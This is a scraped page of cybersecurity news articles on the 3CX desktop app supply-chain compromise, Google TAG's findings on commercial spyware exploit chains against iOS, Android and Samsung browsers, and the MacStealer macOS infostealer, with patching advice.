In a forum post, 3CX's CEO Nick Galea said it's in the process of issuing a new build over the next few hours, and noted that Android and iOS versions are not impacted. "Unfortunately this happened because of an upstream library we use became infected," Galea said, without specifying more details.

In the interim, the company is urging its customers to uninstall the app and install it again, or alternatively use the PWA client.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

3CX Desktop App Targeted in Supply Chain Cyber Attack, Affecting Millions of Users

By Habiba Rashid
Google's Threat Analysis Group (TAG) labeled the spyware campaign as limited but highly targeted.
This is a post from HackRead.com Read the original post: Google reveals spyware attack on Android, iOS, and Chrome

The primary target of this spyware campaign were the unsuspecting users in Italy, Malaysia, and Kazakhstan.

Google’s Threat Analysis Group (TAG) has discovered two highly-targeted mobile spyware campaigns that use zero-day exploits to deploy surveillance software against iPhone and Android smartphone users.

Google TAG discovered two “distinct, limited, and highly targeted” campaigns aimed at users of Android, iOS, and Chrome on mobile devices. The campaigns used zero-day and n-day exploits, taking advantage of the period between when vendors release vulnerability fixes and when hardware manufacturers update end-user devices with those patches, creating exploits for unpatched platforms.

These discoveries highlight the importance of timely software patching by vendors and end-users to prevent malicious actors from exploiting known vulnerabilities. The campaigns also suggest that surveillance software vendors share exploits and techniques to enable the proliferation of potentially dangerous hacking tools.

The first campaign (CVE-2022-42856; CVE-2022-4135) targeted versions of iOS and Android before 15.1 and ARM GPU running Chrome versions before 106, respectively. The payload of the exploit in the first campaign included a simple stager that pinged back the GPS location of the device and allowed the attacker to install an .IPA file onto the affected handset, which can be used to steal information.

The campaign targeted both Android and iOS devices, with initial access attempts delivered via Bit.ly URL shorter links sent over SMS to users located in the following three countries:

1.  Italy
2.  Malaysia
3.  Kazakhstan.

The second campaign (CVE-2022-4262; CVE-2023-0266), which included a complete exploit chain using both zero-days and n-days, targeted the latest version of the Samsung Internet browser.

The payload of the exploit in the second campaign was a C++-based, “fully-featured Android spyware suite” that included libraries for decrypting and capturing data from various chat and browser applications.

Google researchers suspect that the actor involved may be a customer, partner, or otherwise close affiliate of Variston, a commercial spyware vendor.

It is worth noting that as reported by Hackread.com last year, Variston is a Barcelona-based company that Google TAG exposed for exploiting n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender while posing as a custom cybersecurity solutions provider.

An example screenshot from one of the malicious websites targeting users in Italy (Credit: Google)

TAG actively tracks commercial spyware vendors, with more than 30 currently under observation, and identifies exploits or surveillance capabilities sold to state-sponsored actors. These dangerous hacking tools arm governments with surveillance capabilities they would not be able to develop in-house.

These tools, including spyware, are often used to target dissidents, journalists, human rights workers, and opposition-party politicians, posing life-threatening risks.

Although the use of surveillance technology is generally legal under most national or international laws, governments have abused these laws and technologies to target individuals who do not align with their agendas.

Regulators and vendors alike have been cracking down on the production and use of commercial spyware since the revelation of governments abusing NSO Group’s Pegasus mobile spyware to target iPhone users came under international scrutiny.

On March 28, the Biden administration issued an executive order that restricts the use of commercial surveillance tools by the federal government, but Google’s findings show that these efforts have not thwarted the commercial-spyware scene.

It is imperative that regulations governing the production and use of commercial spyware be strengthened to ensure that they are not used to target individuals in violation of their fundamental rights.

The discoveries demonstrate that those creating the exploits are keeping a close eye on vulnerabilities they can exploit for nefarious purposes and are likely colluding to maximize the potential for using them to compromise targeted devices.

1.  Google cracks down on sites with ties to hack-for-hire groups
2.  Israeli Spyware Vendor Use Chrome 0day to Target Journalists
3.  ISPs Helping Attackers Install Hermit Spyware on Smartphones
4.  Malware vendor returns with yet another nasty Android malware
5.  European Spyware Vendor Offer Android and iOS Device Exploits

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Google reveals spyware attack on Android, iOS, and Chrome

Google TAG researchers reveal two campaigns against iOS, Android, and Chrome users that demonstrate how the commercial surveillance market is thriving despite government-imposed limits.

Researchers from Google's Threat Analysis Group (TAG) have discovered two separate, highly-targeted campaigns that use various, unpatched zero-day exploits against users of both iPhone and Android smartphones to deploy spyware.

The discoveries — revealed in a blog post on March 29 — are the result of active tracking that Google TAG does of commercial spyware vendors, with more than 30 of them currently on the radar screen, the researchers said. These vendors sell exploits or surveillance capabilities to state-sponsored threat actors, thus "enabling the proliferation of dangerous hacking tools, arming governments that would not be able to develop these capabilities in-house," the researchers wrote. These are often used to target dissidents, journalists, human rights workers, and opposition-party politicians in potentially life-threatening ways, they noted.

The use of surveillance technologies is currently legal under most national or international laws, and governments have abused these laws and technologies to target individuals that don't align with their agendas. However, since this abuse came under international scrutiny due to the revelation of governments abusing NSO Group's Pegasus mobile spyware to target iPhone users, regulators and vendors alike have been cracking down on the production of and use of commercial spyware.

In fact, on March 28, the Biden administration issued an executive order that falls short of an outright ban on spyware, but restricts the use of commercial surveillance tools by the federal government.

Google's findings this week show that those efforts have done little to thwart the commercial-spyware scene, and "underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments with the technical expertise to develop and operationalize exploits," TAG researchers wrote in the post.

Specifically, the researchers discovered what they characterize as two "distinct, limited, and highly targeted" campaigns aimed at users of Android, iOS, and Chrome on mobile devices. Both use zero-day exploits and n-day exploits. Regarding the latter, the campaigns take particular advantage of the period of time between when vendors release fixes for vulnerabilities and when the hardware manufacturers actually update end-user devices with those patches, creating exploits for unpatched platforms, the researchers said.

This demonstrates that those creating the exploits are keeping a close eye on vulnerabilities that they can exploit for nefarious purposes and are likely colluding to maximize the potential for using them to compromise targeted devices, according to TAG. The campaigns also suggest that surveillance software vendors share exploits and techniques to enable the proliferation of dangerous hacking tools, the researchers wrote in the post.

**The iOS/Android Spyware Campaign**

The first campaign that researchers outlined was discovered in November and exploits two vulnerabilities in iOS and three in Android, including at least one zero-day flaw each.

Researchers found initial access attempts that affect both Android and iOS devices that were delivered via bit.ly links sent over SMS to users located in Italy, Malaysia, and Kazakhstan, they said. The links redirected visitors to pages hosting exploits for either Android or iOS, then redirected them to legitimate websites — "such as a page to track shipments for Italian-based shipment and logistics company BRT, or a popular Malaysian news website," researchers wrote in the post.

The iOS exploit chain targeted versions prior to 15.1 and included an exploit for a WebKit remote code execution (RCE) flaw, tracked as CVE-2022-42856, but a zero-day at the time of the exploit. It involves a type confusion issue within the JIT compiler, the exploit used a PAC bypass technique fixed in March 2022 by Apple. The attack also exploited a sandbox escape and privilege escalation bug in AGXAccelerator, tracked as CVE-2021-30900, which was fixed by Apple in iOS 15.1.

The final payload of the iOS campaign was a simple stager that pings back the GPS location of the device and also allows the attacker to install an .IPA file (iOS application archive) onto the affected handset, researchers said. This file can be used to steal information.

The Android exploit chain in the campaign targeted users on devices that use an ARM GPU running Chrome versions prior to 106, the researchers said. There were three vulnerabilities exploited: CVE-2022-3723, a type confusion vulnerability in Chrome that was fixed in last October in version 107.0.5304.87, CVE-2022-4135, a Chrome GPU sandbox bypass only affecting Android that was a zero-day when exploited and fixed in November, and CVE-2022-38181, a privilege escalation bug fixed by ARM last August.

The significance of attacking ARM and CVE-2022-38181 in particular is that when the fix for this flaw was initially released, several vendors — including Pixel, Samsung, Xiaomi, and Oppo — did not incorporate the patch, giving attackers several months to freely exploit the bug, researchers said.

**Samsung Browser Cyber-Espionage Campaign**

Google TAG researchers discovered the second campaign, which includes a complete exploit chain using both zero-days and n-days to target the latest version of Samsung Internet Browser, in December. The browser runs on Chromium 102 and has not been updated to include recent mitigations, which would have required attackers to do additional work to carry out the exploit, the researchers said.

Attackers delivered the exploits in one-time links sent via SMS to devices located in the United Arab Emirates (UAE), the researchers said. The link directed users to a landing page identical to one present in the Heliconia framework developed by commercial spyware vendor Variston, they added.

The payload of the exploit in this case was a C++-based, "fully-featured Android spyware suite" that included libraries for decrypting and capturing data from various chat and browser applications, the researchers wrote. They suspect that the actor involved may be a customer, partner, or otherwise close affiliate of Variston.

Flaws exploited in the chain were CVE-2022-4262, a type confusion vulnerability in Chrome that was a zero-day at time of exploitation, CVE-2022-3038, a sandbox escape in Chrome fixed in version 105 in June 2022, CVE-2022-22706, a vulnerability in Mali GPU Kernel Driver fixed by ARM in January 2022, and CVE-2023-0266, a race condition vulnerability in the Linux kernel sound subsystem providing kernel read and write access that was a zero-day at the time of exploitation.

"The exploit chain also took advantage of multiple kernel information leak zero-days when exploiting CVE-2022-22706 and CVE-2023-0266" that Google reported to ARM and Samsung, the researchers wrote.

**Limiting Spyware & Protecting Mobile Users**

TAG researchers provided a list of indicators of compromise (IoC) to help device users know if they're being targeted by the campaigns. They also stressed how important it is for vendors as well as users to update their mobile devices with the latest patches as quickly as possible after vulnerabilities and/or exploits for them are discovered.

"A big takeaway here would be to use fully updated software on fully updated devices," Google TAG researchers say in response to questions posed by Dark Reading. "In this case, none of the exploit chains described would have worked."

Google: Commercial Spyware Used by Governments Laden With Zero-Day Exploits

By Deeba Ahmed
The new MacStealer malware is being advertised on a notorious Russian hacker and cybercrime forum.
This is a post from HackRead.com Read the original post: Beware of MacStealer: A New Malware Targeting macOS Catalina Devices

MacStealer steals extensive data from a targeted device, including personal data, iCloud Keychain data, images, passwords, and credit card details.

If your device runs on macOS Catalina, be cautious because a new malware has surfaced dubbed MacStealer, which mainly targets Catalina-running Mac devices and infects both Apple Silicon and Intel chips.

**MacStealer steals a wide range of user data**

Security researchers at Uptycs discovered MacStealer and observed that it steals extensive data from the device, including personal data, iCloud Keychain data, images, passwords, and credit card details.

Furthermore, the malware can steal browser cookies, documents, and login details from the targeted Mac. It works specifically on MacOS Catalina-based Macs. The malware steals cookies and credentials from Google Chrome, Firefox, and Brave browsers along with extracting the Keychain database.

Moreover, it can obtain several file types, such as text files, MP3s, photographs, PowerPoint files, and databases.

**How Does the Attack Take Place?**

The attack starts by taking the Keychain wholesale without accessing its data. The stolen database is transmitted to the attacker via Telegram in encrypted form. A separate ZIP folder is also shared with the attacker through a Telegram bot.

The malware developer, who is selling access to MacStealer for $100 per build, claims that the extracted Keychain cannot be accessed without the master password.

The developer has provided a list of upcoming features of MacStealer, which includes stealing funds from cryptocurrency wallets, a dedicated tool for creating new builds, a custom uploader, a reverse shell, and a control panel. The upcoming versions may also feature the capability to steal data from the Safari browser and Apple Notes.

This is what the MacStealer malware developer has to say on a Russian hacker forum (Image credit: Uptycs)

**How to Stay Safe?**

Researchers couldn’t identify how MacStealer moves between Macs. Initial infections were caused by the weed.dmg app, which bears the icon of a leaf and appears as an executable. When this file is opened, it displays a fake macOS password prompt.

(Image credit: Uptycs)

It is worth noting that this prompt isn’t the same as the genuine macOS password prompt. If the user enters credentials, the tool can access other documents on the device. Therefore, if you are an experienced Mac user, it would be easier to identify this difference.

Keep your Mac device updated and patched, and only download/install files from trusted sources, such as the App Store.

1.  5 macOS Monterey Issues You Need to Fix
2.  macOS Hit By New “Alchimist” Attack Framework
3.  macOS Users hit by Chinese Iron Tiger APT Group
4.  DazzleSpy infects macOS through hacked websites
5.  Multi-platform SysJoker backdoor hits macOS devices

Tag

#chrome